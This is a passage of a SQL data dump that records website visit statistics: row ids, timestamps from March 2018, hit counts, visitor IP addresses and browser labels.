159','firefox'),(222458,1521453690,1,1,0,0,'54.36.148.137','other'),(222459,1521453746,1,1,0,0,'54.36.148.234','other'),(222460,1521453809,1,0,1,0,'66.249.73.73',''),(222461,1521453905,1,1,0,0,'54.36.148.78','other'),(222462,1521453989,1,1,0,0,'54.36.149.86','other'),(222463,1521454060,1,1,0,0,'95.135.197.160','chrome'),(222464,1521454301,2,2,0,0,'91.196.178.94','chrome'),(222465,1521454308,1,1,0,0,'54.36.148.120','other'),(222466,1521454418,2,2,0,0,'37.54.114.62','chrome'),(222467,1521454500,2,2,0,0,'141.8.142.74','other'),(222468,1521454757,1,1,0,0,'8.29.198.26','other'),(222469,1521454766,1,1,0,0,'54.36.148.159','other'),(222470,1521454805,1,1,0,0,'54.36.148.143','other'),(222471,1521455151,1,1,0,0,'54.210.107.179','other'),(222472,1521455351,3,3,0,0,'178.154.171.88','other'),(222473,1521455477,2,2,0,0,'141.8.142.74','other'),(222474,1521455518,2,2,0,0,'77.111.244.21','chrome'),(222475,1521455562,1,1,0,0,'54.36.149.45','other'),(222476,1521455646,1,1,0,0,'54.36.148.206','other'),(222477,1521455829,1,1,0,0,'91.196.177.46','chrome'),(222478,1521456128,1,1,0,0,'54.36.148.140','other'),(222479,1521456483,1,1,0,0,'54.36.148.81','other'),(222480,1521456523,1,1,0,0,'54.210.107.179','other'),(222481,1521456878,1,1,0,0,'54.36.149.0','other'),(222482,1521457085,1,1,0,0,'54.36.148.84','other'),(222483,1521457160,1,1,0,0,'54.36.148.199','other'),(222484,1521457239,1,1,0,0,'54.36.148.41','other'),(222485,1521457514,1,1,0,0,'54.36.148.87','other'),(222486,1521457531,1,1,0,0,'54.36.148.235','other'),(222487,1521457646,1,1,0,0,'54.36.148.74','other'),(222488,1521457785,1,1,0,0,'54.36.148.21','other'),(222489,1521457789,1,1,0,0,'54.36.148.110','other'),(222490,1521457863,1,1,0,0,'54.210.107.179','other'),(222491,1521458211,1,1,0,0,'54.36.149.69','other'),(222492,1521458570,1,0,1,0,'66.249.73.23',''),(222493,1521458669,1,0,1,0,'66.249.73.24',''),(222494,1521458770,1,1,0,0,'54.36.148.106','other'),(222495,1521459154,1,1,0,0,'54.210.107.179','other'),(222496,1521459522,1,1,0,0,'54.36.149.88','other'),(222497,1521459899,1,1,0,0,'54.36.148.222','other'),(222498,1521460508,1,1,0,0,'54.210.107.179','other'),(222499,1521461095,1,1,0,0,'54.36.149.5','other'),(222500,1521461236,1,1,0,0,'130.180.216.253','chrome'),(222501,1521461645,1,1,0,0,'91.196.178.90','firefox'),(222502,1521461825,1,1,0,0,'54.210.107.179','other'),(222503,1521462121,2,2,0,0,'78.111.190.141','chrome'),(222504,1521462364,2,2,0,0,'94.179.208.111','other'),(222505,1521462417,2,2,0,0,'91.196.178.91','chrome'),(222506,1521462737,1,1,0,0,'54.36.148.160','other'),(222507,1521462875,2,2,0,0,'40.77.167.3','other'),(222508,1521462886,1,1,0,0,'54.36.149.51','other'),(222509,1521462945,1,1,0,0,'141.8.142.74','other'),(222510,1521463026,3,3,0,0,'91.196.178.94','chrome'),(222511,1521463204,1,1,0,0,'54.210.107.179','other'),(222512,1521463256,1,1,0,0,'54.36.148.198','other'),(222513,1521463318,1,1,0,0,'91.196.178.91','chrome'),(222514,1521464036,1,1,0,0,'77.111.244.61','chrome'),(222515,1521464085,1,1,0,0,'77.111.244.32','chrome'),(222516,1521464208,1,1,0,0,'54.36.148.104','other'),(222517,1521464224,1,1,0,0,'54.36.148.159','other'),(222518,1521464485,1,1,0,0,'62.216.61.64','chrome'),(222519,1521464569,1,1,0,0,'54.210.107.179','other'),(222520,1521464708,1,1,0,0,'54.36.148.163','other'),(222521,1521464758,1,0,1,0,'66.249.73.23',''),(222522,1521464932,1,1,0,0,'195.114.151.123','chrome'),(222523,1521465350,1,1,0,0,'31.43.31.120','chrome'),(222524,1521465476,1,1,0,0,'54.36.149.40','other'),(222525,1521465717,1,1,0,0,'8.29.198.25','other'),(222526,1521465826,1,1,0,0,'141.8.142.74','other'),(222527,1521465854,1,1,0,0,'54.210.107.179','other'),(222528,1521465940,1,1,0,0,'54.36.148.130','other'),(222529,1521467118,1,1,0,0,'54.36.148.227','other'),(222530,1521467191,1,1,0,0,'54.36.148.28','other'),(222531,1521467371,3,3,0,0,'91.196.178.94','chrome'),(222532,1521467779,1,1,0,0,'54.36.149.54','other'),(222533,1521468199,1,1,0,0,'77.111.244.23','chrome'),(222534,1521468370,1,1,0,0,'54.36.148.162','other'),(222535,1521468499,1,1,0,0,'54.36.148.250','other'),(222536,1521468644,1,1,0,0,'54.210.107.179','other'),(222537,1521468834,1,1,0,0,'54.36.148.185','other'),(222538,1521469314,1,1,0,0,'54.36.148.137','other'),(222539,1521469780,1,1,0,0,'54.36.149.46','other'),(222540,1521469893,1,1,0,0,'141.8.142.74','other'),(222541,1521469945,1,1,0,0,'54.36.148.205','other'),(222542,1521469965,1,1,0,0,'54.210.107.179','other'),(222543,1521470058,1,1,0,0,'54.36.148.26','other'),(222544,1521470083,1,1,0,0,'54.36.148.183','other'),(222545,1521470772,1,1,0,0,'54.36.148.152','other'),(222546,1521470805,1,1,0,0,'91.196.178.91','chrome'),(222547,1521470877,1,1,0,0,'54.36.148.179','other'),(222548,1521470890,1,1,0,0,'54.36.149.54','other'),(222549,1521471189,1,1,0,0,'178.154.171.88','other'),(222550,1521471326,1,1,0,0,'91.196.178.101','chrome'),(222551,1521471338,1,1,0,0,'54.210.107.179','other'),(222552,1521471339,2,2,0,0,'134.249.146.125','chrome'),(222553,1521471395,1,1,0,0,'109.122.60.37','chrome'),(222554,1521471408,1,1,0,0,'54.36.149.19','other'),(222555,1521471459,1,1,0,0,'54.36.149.66','other'),(222556,1521471659,2,2,0,0,'91.196.178.94','chrome'),(222557,1521471811,1,1,0,0,'141.8.142.74','other'),(222558,1521471820,1,1,0,0,'54.36.149.11','other'),(222559,1521471824,2,2,0,0,'91.196.178.27','chrome'),(222560,1521471908,1,1,0,0,'54.36.149.7','other'),(222561,1521472299,1,1,0,0,'95.133.7.208','msie'),(222562,1521472542,1,1,0,0,'54.36.148.150','other'),(222563,1521472557,1,1,0,0,'54.36.148.23','other'),(222564,1521472695,1,1,0,0,'54.210.107.179','other'),(222565,1521472916,1,1,0,0,'188.230.43.254','other'),(222566,1521473136,1,1,0,0,'207.46.13.21','other'),(222567,1521473176,1,1,0,0,'178.154.171.88','other'),(222568,1521473307,1,1,0,0,'54.36.148.52','other'),(222569,1521473934,1,1,0,0,'54.36.148.146','other'),(222570,1521474027,1,1,0,0,'54.210.107.179','other'),(222571,1521474212,1,1,0,0,'141.8.142.74','other'),(222572,1521475317,1,1,0,0,'188.230.43.254','other'),(222573,1521475468,1,1,0,0,'54.210.107.179','other'),(222574,1521476057,1,1,0,0,'80.252.154.233','chrome'),(222575,1521476196,1,1,0,0,'91.196.178.92','firefox'),(222576,1521476230,1,1,0,0,'188.230.43.254','other'),(222577,1521476538,1,0,1,0,'66.249.73.23',''),(222578,1521476539,1,1,0,0,'54.36.148.143','other'),(222579,1521476545,1,1,0,0,'54.36.148.222','other'),(222580,1521476617,1,1,0,0,'8.29.198.26','other'),(222581,1521476787,1,1,0,0,'54.210.107.179','other'),(222582,1521477188,1,1,0,0,'54.36.149.4','other'),(222583,1521477217,1,1,0,0,'54.36.149.78','other'),(222584,1521477235,1,1,0,0,'54.36.148.243','other'),(222585,1521477521,1,1,0,0,'54.36.148.26','other'),(222586,1521477875,1,1,0,0,'54.36.148.191','other'),(222587,1521477904,1,1,0,0,'54.36.148.45','other'),(222588,1521478157,1,1,0,0,'54.210.107.179','other'),(222589,1521478286,1,1,0,0,'54.36.148.117','other'),(222590,1521478313,1,1,0,0,'188.230.43.254','other'),(222591,1521478650,1,1,0,0,'204.79.180.0','msie'),(222592,1521479338,1,1,0,0,'40.77.167.183','other'),(222593,1521479456,1,1,0,0,'54.210.107.179','other'),(222594,1521480341,1,1,0,0,'207.46.13.21','other'),(222595,1521480847,3,3,0,0,'141.8.142.74','other'),(222596,1521480866,2,2,0,0,'178.154.171.88','other'),(222597,1521480874,1,1,0,0,'87.250.224.46','other'),(222598,1521480917,1,1,0,0,'37.9.113.182','other'),(222599,1521480930,1,1,0,0,'217.69.133.67','other'),(222600,1521480996,1,1,0,0,'54.36.148.57','other'),(222601,1521481391,1,1,0,0,'207.46.13.21','other'),(222602,1521481650,1,1,0,0,'54.36.148.25','other'),(222603,1521481706,1,1,0,0,'157.55.39.34','other'),(222604,1521481789,1,1,0,0,'54.36.148.93','other'),(222605,1521482100,1,1,0,0,'66.249.73.89','chrome'),(222606,1521482134,2,2,0,0,'141.8.142.74','other'),(222607,1521482221,1,1,0,0,'54.210.107.179','other'),(222608,1521482567,1,1,0,0,'54.36.148.237','other'),(222609,1521482628,1,1,0,0,'54.36.148.229','other'),(222610,1521482817,1,1,0,0,'35.226.23.240','other'),(222611,1521482879,3,3,0,0,'91.196.178.26','chrome'),(222612,1521483005,1,1,0,0,'178.92.72.196','chrome'),(222613,1521483584,1,1,0,0,'54.210.107.179','other'),(222614,1521483899,1,0,1,0,'66.249.73.91',''),(222615,1521483953,1,1,0,0,'216.244.66.237','other'),(222616,1521483954,1,1,0,0,'95.132.133.35','firefox'),(222617,1521484007,1,1,0,0,'66.249.73.25','chrome'),(222618,1521484009,2,0,2,0,'66.249.73.93',''),(222619,1521484421,1,1,0,0,'87.250.224.46','other'),(222620,1521484616,1,1,0,0,'54.36.149.91','other'),(222621,1521484691,1,1,0,0,'176.36.108.37','firefox'),(222622,1521484821,3,3,0,0,'178.154.171.88','other'),(222623,1521484824,2,2,0,0,'141.8.142.74','other'),(222624,1521485019,1,1,0,0,'54.210.107.179','other'),(222625,1521485225,1,1,0,0,'91.196.178.92','firefox'),(222626,1521485245,2,2,0,0,'92.112.125.105','chrome'),(222627,1521485459,1,1,0,0,'216.244.66.237','other'),(222628,1521485622,3,3,0,0,'5.53.113.210','chrome'),(222629,1521485780,1,1,0,0,'54.36.148.105','other'),(222630,1521486188,1,1,0,0,'54.36.149.81','other'),(222631,1521486274,1,1,0,0,'54.36.148.122','other'),(222632,1521486347,1,1,0,0,'54.210.107.179','other'),(222633,1521486765,1,1,0,0,'54.36.148.90','other'),(222634,1521486941,1,1,0,0,'54.36.149.62','other'),(222635,1521486979,1,1,0,0,'46.211.114.200','chrome'),(222636,1521487013,1,1,0,0,'54.36.149.58','other'),(222637,1521487123,1,1,0,0,'37.55.142.226','chrome'),(222638,1521487356,1,1,0,0,'93.73.111.185','other'),(222639,1521487488,1,1,0,0,'8.29.198.25','other'),(222640,1521487506,1,1,0,0,'178.154.171.88','other'),(222641,1521487636,1,1,0,0,'54.210.107.179','other'),(222642,1521487662,1,1,0,0,'54.36.148.13','other'),(222643,1521487743,1,1,0,0,'216.244.66.246','other'),(222644,1521488196,1,1,0,0,'54.36.148.58','other'),(222645,1521488266,1,1,0,0,'40.77.167.3','other'),(222646,1521488975,1,1,0,0,'141.8.142.74','other'),(222647,1521489001,1,1,0,0,'46.161.9.56','chrome'),(222648,1521489039,1,1,0,0,'54.210.107.179','other'),(222649,1521489066,1,1,0,0,'54.36.148.93','other'),(222650,1521489199,1,1,0,0,'54.36.149.31','other'),(222651,1521490125,2,2,0,0,'91.196.178.59','chrome'),(222652,1521490361,1,1,0,0,'54.210.107.179','other'),(222653,1521491205,1,1,0,0,'54.36.148.18','other'),(222654,1521491467,1,1,0,0,'216.244.66.237','other'),(222655,1521491656,1,1,0,0,'54.210.107.179','other'),(222656,1521491860,1,1,0,0,'91.196.178.132','chrome'),(222657,1521491912,1,1,0,0,'178.154.171.88','other'),(222658,1521492227,1,1,0,0,'54.36.148.126','other'),(222659,1521493026,1,1,0,0,'54.36.149.10','other'),(222660,1521493059,1,1,0,0,'54.210.107.179','other'),(222661,1521493691,1,1,0,0,'54.36.148.101','other'),(222662,1521493868,1,1,0,0,'141.8.142.74','other'),(222663,1521494278,1,1,0,0,'35.226.23.240','other'),(222664,1521494545,1,1,0,0,'54.36.148.252','other'),(222665,1521494629,1,1,0,0,'185.12.9.85','chrome'),(222666,1521494787,1,1,0,0,'54.36.148.126','other'),(222667,1521494910,3,3,0,0,'141.8.142.74','other'),(222668,1521494911,1,1,0,0,'178.154.171.88','other'),(222669,1521495040,1,1,0,0,'54.36.148.143','other'),(222670,1521495043,1,1,0,0,'54.36.149.28','other'),(222671,1521495138,1,1,0,0,'54.36.148.46','other'),(222672,1521495162,1,0,1,0,'66.249.73.93',''),(222673,1521495374,1,1,0,0,'54.36.149.40','other'),(222674,1521495653,1,1,0,0,'46.161.9.56','firefox'),(222675,1521495791,1,1,0,0,'54.210.107.179','other'),(222676,1521495961,1,1,0,0,'141.8.142.74','other'),(222677,1521496179,1,1,0,0,'54.36.149.103','other'),(222678,1521496311,1,1,0,0,'54.36.149.49','other'),(222679,1521496646,1,1,0,0,'54.36.148.18','other'),(222680,1521497155,1,1,0,0,'54.210.107.179','other'),(222681,1521497385,1,1,0,0,'141.8.142.74','other'),(222682,1521497447,1,1,0,0,'54.36.149.89','other'),(222683,1521497474,1,1,0,0,'79.7.218.134','other'),(222684,1521497532,1,1,0,0,'37.9.113.182','other'),(222685,1521497996,1,1,0,0,'180.76.15.154','other'),(222686,1521497998,1,1,0,0,'54.36.148.17','other'),(222687,1521498356,1,1,0,0,'8.29.198.26','other'),(222688,1521498368,1,0,1,0,'66.249.73.24',''),(222689,1521498489,1,1,0,0,'54.210.107.179','other'),(222690,1521498601,1,1,0,0,'54.36.148.70','other'),(222691,1521499066,1,1,0,0,'54.36.148.78','other'),(222692,1521499244,1,0,1,0,'66.249.73.25',''),(222693,1521499335,2,2,0,0,'178.154.171.88','other'),(222694,1521499771,1,1,0,0,'54.36.148.15','other'),(222695,1521499864,2,2,0,0,'141.8.142.74','other'),(222696,1521499889,1,1,0,0,'54.210.107.179','other'),(222697,1521500424,1,1,0,0,'54.36.148.232','other'),(222698,1521500746,1,1,0,0,'54.36.149.53','other'),(222699,1521501271,1,1,0,0,'54.210.107.179','other'),(222700,1521501515,1,1,0,0,'178.154.171.88','other'),(222701,1521501664,1,1,0,0,'54.36.148.252','other'),(222702,1521501710,1,1,0,0,'54.36.148.136','other'),(222703,1521501932,1,0,1,0,'66.249.73.24',''),(222704,1521502107,1,1,0,0,'66.249.73.91','chrome'),(222705,1521502260,1,1,0,0,'141.8.142.74','other'),(222706,1521502585,1,1,0,0,'54.210.107.179','other'),(222707,1521502696,1,1,0,0,'54.36.148.229','other'),(222708,1521502865,1,0,1,0,'66.249.73.24',''),(222709,1521502881,1,0,1,0,'66.249.73.23',''),(222710,1521502892,1,1,0,0,'54.36.149.103','other'),(222711,1521503345,1,1,0,0,'54.36.149.23','other'),(222712,1521503833,1,1,0,0,'178.154.171.88','other'),(222713,1521503957,1,1,0,0,'54.210.107.179','other'),(222714,1521504146,1,1,0,0,'216.244.66.237','other'),(222715,1521504373,1,1,0,0,'217.69.133.14','other'),(222716,1521504876,1,0,1,0,'66.249.73.23',''),(222717,1521505221,1,1,0,0,'54.36.148.105','other'),(222718,1521505278,1,1,0,0,'54.210.107.179','other'),(222719,1521505299,1,1,0,0,'54.36.148.215','other'),(222720,1521505674,1,1,0,0,'212.115.235.117','firefox'),(222721,1521505882,1,1,0,0,'66.249.73.91','chrome'),(222722,1521506303,1,1,0,0,'54.36.148.246','other'),(222723,1521506385,1,1,0,0,'54.36.148.26','other'),(222724,1521506498,1,1,0,0,'178.154.171.88','other'),(222725,1521506722,1,1,0,0,'54.210.107.179','other'),(222726,1521507313,2,2,0,0,'141.8.142.74','other'),(222727,1521507321,1,1,0,0,'54.36.148.144','other'),(222728,1521507353,2,2,0,0,'54.36.148.201','other'),(222729,1521507978,1,1,0,0,'54.36.148.161','other'),(222730,1521508558,1,1,0,0,'157.55.39.164','other'),(222731,1521509026,1,1,0,0,'54.36.149.64','other'),(222732,1521509223,1,1,0,0,'8.29.198.26','other'),(222733,1521509231,1,1,0,0,'54.36.149.56','other'),(222734,1521509259,1,1,0,0,'54.36.148.74','other'),(222735,1521509323,1,1,0,0,'54.36.148.172','other'),(222736,1521509644,1,0,1,0,'66.249.73.89',''),(222737,1521509671,1,1,0,0,'54.36.148.154','other'),(222738,1521509769,1,0,1,0,'66.249.73.25',''),(222739,1521509777,1,1,0,0,'54.210.107.179','other'),(222740,1521509842,1,1,0,0,'54.36.148.36','other'),(222741,1521511221,1,1,0,0,'54.210.107.179','other'),(222742,1521511609,2,0,2,0,'66.249.66.199',''),(222743,1521511719,1,1,0,0,'87.250.224.46','other'),(222744,1521511733,1,1,0,0,'54.36.148.196','other'),(222745,1521512022,1,1,0,0,'54.36.148.137','other'),(222746,1521512474,1,1,0,0,'216.244.66.237','other'),(222747,1521512557,1,1,0,0,'54.210.107.179','other'),(222748,1521512649,1,1,0,0,'207.46.13.143','other'),(222749,1521512709,1,1,0,0,'54.36.149.57','other'),(222750,1521513007,1,0,1,0,'66.249.66.199',''),(222751,1521513560,1,1,0,0,'54.36.149.38','other'),(222752,1521513781,1,1,0,0,'54.36.149.88','other'),(222753,1521513851,1,1,0,0,'54.36.148.175','other'),(222754,1521514001,1,1,0,0,'54.210.107.179','other'),(222755,1521515018,1,1,0,0,'54.36.148.242','other'),(222756,1521515124,1,1,0,0,'54.36.148.220','other'),(222757,1521515342,1,1,0,0,'54.210.107.179','other'),(222758,1521516575,1,1,0,0,'54.36.149.29','other'),(222759,1521516581,1,1,0,0,'54.36.149.1','other'),(222760,1521516590,1,1,0,0,'216.244.66.237','other'),(222761,1521516679,1,1,0,0,'217.69.133.28','other'),(222762,1521516694,1,1,0,0,'54.210.107.179','other'),(222763,1521516898,1,1,0,0,'141.8.142.74','other'),(222764,1521517499,1,1,0,0,'54.36.148.73','other'),(222765,1521517577,1,1,0,0,'54.36.148.164','other'),(222766,1521517644,1,1,0,0,'54.36.148.126','other'),(222767,1521517688,1,1,0,0,'54.36.149.97','other'),(222768,1521517979,1,1,0,0,'54.36.148.210','other'),(222769,1521518027,1,1,0,0,'141.8.142.74','other'),(222770,1521518146,1,1,0,0,'54.210.107.179','other'),(222771,1521518543,1,1,0,0,'54.36.148.100','other'),(222772,1521518710,1,1,0,0,'54.36.148.52','other'),(222773,1521519358,1,1,0,0,'54.36.148.31','other'),(222774,1521519501,1,1,0,0,'54.210.107.179','other'),(222775,1521519728,1,1,0,0,'91.209.11.236','other'),(222776,1521519920,1,1,0,0,'87.250.224.46','other'),(222777,1521519934,1,1,0,0,'54.36.148.123','other'),(222778,1521520089,1,1,0,0,'8.29.198.26','other'),(222779,1521520785,2,2,0,0,'92.112.125.105','chrome'),(222780,1521520943,1,1,0,0,'54.210.107.179','other'),(222781,1521520960,1,1,0,0,'54.36.148.30','other'),(222782,1521522519,1,1,0,0,'54.36.148.173','other'),(222783,1521522548,1,1,0,0,'54.36.149.87','other'),(222784,1521522597,1,1,0,0,'54.36.148.104','other'),(222785,1521523277,1,1,0,0,'87.250.224.46','other'),(222786,1521523762,1,1,0,0,'54.210.107.179','other'),(222787,1521524294,2,2,0,0,'54.36.148.162','other'),(222788,1521524424,1,1,0,0,'54.36.148.13','other'),(222789,1521524521,1,1,0,0,'54.36.148.11','other'),(222790,1521524848,1,1,0,0,'217.69.133.231','other'),(222791,1521525052,1,1,0,0,'178.154.171.88','other'),(222792,1521525132,1,1,0,0,'54.36.148.248','other'),(222793,1521525232,1,1,0,0,'54.36.148.49','other'),(222794,1521525280,1,1,0,0,'54.36.148.96','other'),(222795,1521525293,1,1,0,0,'54.210.107.179','other'),(222796,1521525388,1,1,0,0,'216.244.66.237','other'),(222797,1521525548,1,1,0,0,'54.36.148.242','other'),(222798,1521525906,40,40,0,0,'81.209.177.189','other'),(222799,1521525975,33,33,0,0,'81.209.177.136','other'),(222800,1521526184,1,0,1,0,'66.249.66.195',''),(222801,1521526330,1,1,0,0,'54.36.148.205','other'),(222802,1521526366,1,1,0,0,'95.132.17.1','chrome'),(222803,1521526485,1,1,0,0,'216.244.66.237','other'),(222804,1521526585,1,1,0,0,'54.36.148.229','other'),(222805,1521526643,2,2,0,0,'77.111.244.25','chrome'),(222806,1521526653,1,1,0,0,'54.210.107.179','other'),(222807,1521526807,47,47,0,0,'81.209.177.189','other'),(222808,1521526856,1,1,0,0,'54.36.148.100','other'),(222809,1521526909,1,1,0,0,'54.36.149.101','other'),(222810,1521526997,22,22,0,0,'81.209.177.136','other'),(222811,1521527433,2,2,0,0,'78.111.190.34','chrome'),(222812,1521527616,2,2,0,0,'141.8.142.74','other'),(222813,1521527672,1,1,0,0,'54.36.148.179','other'),(222814,1521527714,46,46,0,0,'81.209.177.189','other'),(222815,1521527886,1,1,0,0,'54.36.148.116','other'),(222816,1521527902,30,30,0,0,'81.209.177.136','other'),(222817,1521527972,1,1,0,0,'54.210.107.179','other'),(222818,1521528086,1,1,0,0,'54.36.148.18','other'),(222819,1521528255,1,1,0,0,'91.124.182.170','firefox'),(222820,1521528321,2,2,0,0,'91.196.178.90','firefox'),(222821,1521528493,1,1,0,0,'54.36.148.81','other'),(222822,1521528623,50,50,0,0,'81.209.177.189','other'),(222823,1521528857,24,24,0,0,'81.209.177.136','other'),(222824,1521529231,1,1,0,0,'125.209.235.169','other'),(222825,1521529277,1,1,0,0,'54.36.148.71','other'),(222826,1521529334,1,1,0,0,'91.196.178.91','firefox'),(222827,1521529340,1,1,0,0,'37.55.56.67','chrome'),(222828,1521529365,1,1,0,0,'54.36.148.199','other'),(222829,1521529381,1,1,0,0,'54.210.107.179','other'),(222830,1521529464,1,1,0,0,'37.9.113.101','other'),(222831,1521529483,1,1,0,0,'54.36.148.100','other'),(222832,1521529496,1,1,0,0,'54.36.148.81','other'),(222833,1521529515,1,1,0,0,'54.36.148.61','other'),(222834,1521529538,47,47,0,0,'81.209.177.189','other'),(222835,1521529601,3,3,0,0,'87.250.224.46','other'),(222836,1521529798,2,2,0,0,'46.201.40.170','chrome'),(222837,1521529801,26,26,0,0,'81.209.177.136','other'),(222838,1521529844,1,1,0,0,'54.36.149.41','other'),(222839,1521529881,1,1,0,0,'178.154.171.88','other'),(222840,1521529906,2,2,0,0,'195.230.119.59','chrome'),(222841,1521530233,1,1,0,0,'91.196.178.9','chrome'),(222842,1521530452,48,48,0,0,'81.209.177.189','other'),(222843,1521530710,23,23,0,0,'81.209.177.136','other'),(222844,1521530793,1,1,0,0,'54.210.107.179','other'),(222845,1521530918,1,1,0,0,'54.36.148.193','other'),(222846,1521530952,1,1,0,0,'8.29.198.27','other'),(222847,1521531206,1,1,0,0,'54.36.149.88','other'),(222848,1521531287,2,2,0,0,'178.154.171.88','other'),(222849,1521531357,44,44,0,0,'81.209.177.189','other'),(222850,1521531410,1,1,0,0,'37.52.158.57','chrome'),(222851,1521531468,3,3,0,0,'35.226.23.240','other'),(222852,1521531545,1,1,0,0,'54.36.149.76','other'),(222853,1521531655,38,38,0,0,'81.209.177.136','other'),(222854,1521531786,3,3,0,0,'91.196.178.94','chrome'),(222855,1521532252,1,1,0,0,'54.210.107.179','other'),(222856,1521532261,51,51,0,0,'81.209.177.189','other'),(222857,1521532262,2,2,0,0,'91.196.178.90','chrome'),(222858,1521532541,1,1,0,0,'193.108.50.39','chrome'),(222859,1521532678,1,1,0,0,'87.250.224.46','other'),(222860,1521532715,37,37,0,0,'81.209.177.136','other'),(222861,1521532811,1,1,0,0,'54.36.148.227','other'),(222862,1521533166,47,47,0,0,'81.209.177.189','other'),(222863,1521533309,1,1,0,0,'54.36.148.181','other'),(222864,1521533311,1,1,0,0,'54.36.148.131','other'),(222865,1521533396,1,1,0,0,'54.36.148.82','other'),(222866,1521533553,1,0,1,0,'66.249.66.199',''),(222867,1521533668,1,1,0,0,'54.210.107.179','other'),(222868,1521533674,34,34,0,0,'81.209.177.136','other'),(222869,1521533915,1,1,0,0,'193.108.50.39','chrome'),(222870,1521533980,1,1,0,0,'92.112.125.243','chrome'),(222871,1521534080,52,52,0,0,'81.209.177.189','other'),(222872,1521534353,1,1,0,0,'195.22.108.134','chrome'),(222873,1521534596,30,30,0,0,'81.209.177.136','other'),(222874,1521534685,1,1,0,0,'192.81.222.95','chrome'),(222875,1521534991,49,49,0,0,'81.209.177.189','other'),(222876,1521535037,3,3,0,0,'46.201.112.21','chrome'),(222877,1521535052,1,1,0,0,'54.210.107.179','other'),(222878,1521535269,1,1,0,0,'91.196.178.101','chrome'),(222879,1521535332,2,2,0,0,'91.196.178.168','chrome'),(222880,1521535517,25,25,0,0,'81.209.177.136','other'),(222881,1521535910,54,54,0,0,'81.209.177.189','other'),(222882,1521535936,2,2,0,0,'141.8.142.74','other'),(222883,1521536315,1,1,0,0,'193.108.50.39','chrome'),(222884,1521536429,29,29,0,0,'81.209.177.136','other'),(222885,1521536811,49,49,0,0,'81.209.177.189','other'),(222886,1521536883,1,1,0,0,'54.36.149.28','other'),(222887,1521536942,1,1,0,0,'54.36.149.2','other'),(222888,1521537008,1,1,0,0,'178.154.171.88','other'),(222889,1521537072,1,1,0,0,'157.55.39.238','other'),(222890,1521537374,19,19,0,0,'81.209.177.136','other'),(222891,1521537376,1,1,0,0,'54.36.148.171','other'),(222892,1521537736,7,7,0,0,'81.209.177.189','other'),(222893,1521537834,1,1,0,0,'54.36.148.143','other'),(222894,1521538047,1,1,0,0,'54.210.107.179','other'),(222895,1521538069,2,2,0,0,'78.111.190.34','chrome'),(222896,1521538308,1,1,0,0,'54.36.148.155','other'),(222897,1521538369,1,1,0,0,'54.36.149.97','other'),(222898,1521538434,1,1,0,0,'91.196.177.137','firefox'),(222899,1521538505,1,1,0,0,'54.36.148.58','other'),(222900,1521538559,1,1,0,0,'109.169.46.22','firefox'),(222901,1521538718,1,1,0,0,'54.36.148.20','other'),(222902,1521538731,1,1,0,0,'54.36.148.130','other'),(222903,1521538908,1,1,0,0,'216.244.66.237','other'),(222904,1521539152,1,1,0,0,'54.36.149.70','other'),(222905,1521539496,1,1,0,0,'54.210.107.179','other'),(222906,1521539818,1,1,0,0,'54.36.149.92','other'),(222907,1521539924,1,1,0,0,'54.36.148.203','other'),(222908,1521539945,1,1,0,0,'54.36.148.179','other'),(222909,1521540042,1,1,0,0,'54.36.148.166','other'),(222910,1521540189,1,1,0,0,'95.132.23.206','firefox'),(222911,1521540221,2,2,0,0,'91.196.121.14','chrome'),(222912,1521540224,1,1,0,0,'141.8.142.74','other'),(222913,1521540335,4,4,0,0,'91.196.178.94','chrome'),(222914,1521540677,2,2,0,0,'95.132.49.226','chrome'),(222915,1521540728,1,0,1,0,'66.249.66.158',''),(222916,1521540865,1,1,0,0,'54.210.107.179','other'),(222917,1521540946,1,1,0,0,'54.36.148.227','other'),(222918,1521541037,3,3,0,0,'91.196.177.46','chrome'),(222919,1521541089,1,1,0,0,'103.212.144.243','other'),(222920,1521541223,1,1,0,0,'54.36.148.245','other'),(222921,1521541424,1,1,0,0,'91.196.177.176','chrome'),(222922,1521541825,1,1,0,0,'8.29.198.26','other'),(222923,1521541914,1,1,0,0,'54.36.148.167','other'),(222924,1521542113,1,1,0,0,'54.36.148.10','other'),(222925,1521542226,1,1,0,0,'54.36.148.124','other'),(222926,1521542251,1,1,0,0,'54.210.107.179','other'),(222927,1521542383,1,1,0,0,'40.77.167.43','other'),(222928,1521542415,1,1,0,0,'37.115.142.126','chrome'),(222929,1521542427,1,1,0,0,'54.36.149.97','other'),(222930,1521542509,1,1,0,0,'54.36.148.102','other'),(222931,1521542883,1,1,0,0,'141.8.142.74','other'),(222932,1521543111,1,1,0,0,'54.36.149.36','other'),(222933,1521543174,1,1,0,0,'54.36.148.41','other'),(222934,1521543224,2,2,0,0,'77.111.244.47','chrome'),(222935,1521543412,1,1,0,0,'91.196.177.176','chrome'),(222936,1521543559,1,1,0,0,'178.255.215.94','other'),(222937,1521543670,1,1,0,0,'216.244.66.237','other'),(222938,1521543725,1,1,0,0,'54.210.107.179','other'),(222939,1521543728,1,1,0,0,'54.36.148.224','other'),(222940,1521543794,1,1,0,0,'178.154.171.88','other'),(222941,1521543890,1,1,0,0,'54.36.148.199','other'),(222942,1521543933,1,1,0,0,'54.36.148.38','other'),(222943,1521544155,1,1,0,0,'54.36.148.78','other'),(222944,1521544449,2,2,0,0,'91.196.178.134','firefox'),(222945,1521544575,1,1,0,0,'54.36.149.19','other'),(222946,1521545117,1,1,0,0,'40.77.167.42','other'),(222947,1521545129,1,1,0,0,'54.210.107.179','other'),(222948,1521545403,1,1,0,0,'141.8.142.74','other'),(222949,1521545746,1,1,0,0,'54.36.148.30','other'),(222950,1521545747,1,1,0,0,'54.36.148.59','other'),(222951,1521545811,1,1,0,0,'54.36.149.1','other'),(222952,1521545879,2,2,0,0,'178.154.171.88','other'),(222953,1521545990,1,1,0,0,'54.36.148.144','other'),(222954,1521546307,1,1,0,0,'204.79.180.18','msie'),(222955,1521546355,1,1,0,0,'54.36.148.112','other'),(222956,1521546414,1,1,0,0,'91.196.178.164','chrome'),(222957,1521546572,1,1,0,0,'54.210.107.179','other'),(222958,1521546602,1,1,0,0,'54.36.148.247','other'),(222959,1521546793,1,1,0,0,'216.244.66.237','other'),(222960,1521546851,1,1,0,0,'195.245.221.117','other'),(222961,1521546854,1,1,0,0,'141.8.142.74','other'),(222962,1521546895,1,1,0,0,'87.250.224.46','other'),(222963,1521547037,1,1,0,0,'141.8.132.19','other'),(222964,1521547285,1,1,0,0,'40.77.167.42','other'),(222965,1521547496,1,1,0,0,'54.36.148.199','other'),(222966,1521547564,1,1,0,0,'130.180.219.34','chrome'),(222967,1521547799,1,1,0,0,'141.8.142.74','other'),(222968,1521548027,1,1,0,0,'54.210.107.179','other'),(222969,1521548366,1,1,0,0,'91.196.177.46'